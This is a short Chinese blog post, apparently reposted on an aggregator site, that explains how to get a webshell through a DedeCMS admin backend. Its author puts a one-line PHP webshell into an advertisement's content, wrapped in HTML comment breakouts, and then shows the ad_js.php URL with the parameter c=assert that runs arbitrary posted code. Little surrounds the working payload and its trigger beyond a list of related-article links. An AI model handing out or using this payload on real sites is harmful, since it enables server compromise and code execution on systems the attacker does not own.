另类dedecms后台拿shell

Posted nul1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了另类dedecms后台拿shell相关的知识,希望对你有一定的参考价值。

遇到一个被阉割的后台,发现直接传shell显然不行。

然后就有了下文

添加一个新广告。

插入一句话木马:

 1 --><?php $_GET[c]($_POST[x]);?><!-- 

然后访问:

/plus/ad_js.php?aid=42&c=assert

aid后面的值是你广告的id。

以上是关于另类dedecms后台拿shell的主要内容,如果未能解决你的问题,请参考以下文章

dedecms安装百度分享插件后后台500错误

蓝桥杯-2/14天-完全平方数另类思路

dedecms 后台验证文章是不是被百度收录插件

dedecms织梦后台password忘记了怎么办?dedecms织梦后台password忘记怎样找回password?

织梦dedecms后台登陆密码充值工具

读DEDECMS找后台目录有感